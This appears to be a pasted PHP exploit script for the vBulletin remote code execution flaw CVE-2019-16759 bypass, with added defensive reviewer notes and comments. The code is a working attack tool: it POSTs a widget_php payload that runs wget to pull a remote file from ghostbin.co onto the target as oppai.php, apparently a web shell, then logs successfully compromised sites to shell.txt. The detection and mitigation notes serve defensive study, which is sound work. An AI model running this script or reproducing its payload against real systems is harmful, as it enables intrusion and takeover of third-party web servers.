ToKeiChun

vbulletin RCE CVE-2019-16759 bypass direct

Sep 22nd, 2020 (edited)
<?php
/*  vbulletin RCE CVE-2019-16759 bypass direct
(translated from Indonesian slang, roughly: "fires straight away")
(author tag, roughly: "Mantod is handsome")
source : https://pastebin.com/raw/eb9Frt8D

Reviewer notes (defensive reading of this listing)

What the script does, as visible below:
  1. Reads a base URL from STDIN.
  2. POSTs to <url>/ajax/render/widget_tabbedcontainer_tab_panel with a body
     that sets subWidgets[0][template]=widget_php and places PHP source in
     subWidgets[0][config][code]. That PHP calls passthru() to run wget,
     which saves a remote file as oppai.php in the process's working directory.
  3. GETs <url>/oppai.php and treats HTTP 200 as "file was dropped".
  4. Appends the resulting URL to a local shell.txt.

Detection pointers taken from the request and payload shown here:
  - POST requests to /ajax/render/widget_tabbedcontainer_tab_panel whose body
    contains both "subWidgets" and "widget_php".
  - The web-server account spawning wget, and outbound HTTPS from the web
    server to ghostbin.co.
  - A new oppai.php in the document root, followed by GET /oppai.php.

Mitigation pointers:
  - Apply the vendor's security patches for CVE-2019-16759 and its bypass.
  - Interim hardening commonly recommended for this bug class: disable PHP
    widget/module rendering in the forum's admin settings.
  - Deny outbound connections from the web tier by default and keep the
    document root non-writable for the web-server account.

Triage caveat: success is decided only by the HTTP status of the second
request, so an entry in a list produced by this script is an indicator to
investigate, not proof that a file was written. Confirm on disk.
 */
 // Silences all PHP errors and warnings for the rest of the run.
 error_reporting(0);
 echo " ~] Url to vBulletin : ";
// Target base URL comes from interactive input; only surrounding whitespace is removed.
$url = trim(fgets(STDIN));
        // Form-encoded body. The two parameter names (subWidgets[0][template],
        // subWidgets[0][config][code]) and the value widget_php are the stable
        // strings to match in request-body inspection. The content of the file
        // fetched by wget is not visible in this listing; the local output name
        // shell.txt suggests a web shell (unconfirmed from this page).
        $d = "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo passthru('wget -S https://ghostbin.co/paste/g2gen/raw -O oppai.php');";
    $vb     = curl_init();
    // Route targeted by the first request.
    curl_setopt($vb, CURLOPT_URL, $url . '/ajax/render/widget_tabbedcontainer_tab_panel');
    curl_setopt($vb, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($vb, CURLOPT_FOLLOWLOCATION, 1);
    // TLS certificate and host-name verification are both switched off for this handle.
    curl_setopt ($vb, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($vb, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($vb, CURLOPT_TIMEOUT, 10);
    // Setting POSTFIELDS makes this a POST carrying the body built above.
    curl_setopt($vb, CURLOPT_POSTFIELDS, $d);
    // The response body is stored but never read afterwards.
    $memek = curl_exec($vb);
    curl_close($vb);
    // Second request: a plain GET for the file name used in the payload.
    $tempek = curl_init();
    curl_setopt($tempek, CURLOPT_URL, $url . '/oppai.php');
    curl_setopt($tempek, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($tempek, CURLOPT_FOLLOWLOCATION, 1);
    // $pu (the body) is unused; only the final HTTP status code is consulted.
    $pu    = curl_exec($tempek);
    $bjirr = curl_getinfo($tempek, CURLINFO_HTTP_CODE);
    curl_close($tempek);
    // Status 200 is the sole success criterion; the response content is not checked.
    if ($bjirr == 200) {
        echo "$url saved (shell.txt)\n";
        // Appends "<url>/oppai.php" on a new line of shell.txt in the current directory.
        $save = 'shell.txt';
            $seve = fopen($save, 'a+') or die('Cannot open file:  '.$save);
            $data = $url . '/oppai.php';
            fwrite($seve, "\n".$data);
            fclose($seve);
    // Every branch below prints the same message; a status code not listed
    // here (including 0 when no response was received) produces no output.
    } else if ($bjirr == 404) {
        echo "not vuln\n";
    }
    else if ($bjirr == 403) {
        echo "not vuln\n";
    }
    else if ($bjirr == 400) {
        echo "not vuln\n";
    }
    else if ($bjirr == 500) {
        echo "not vuln\n";
    }
    else if ($bjirr == 301) {
        echo "not vuln\n";
    }
    else if ($bjirr == 503) {
        echo "not vuln\n";
    }
    ?>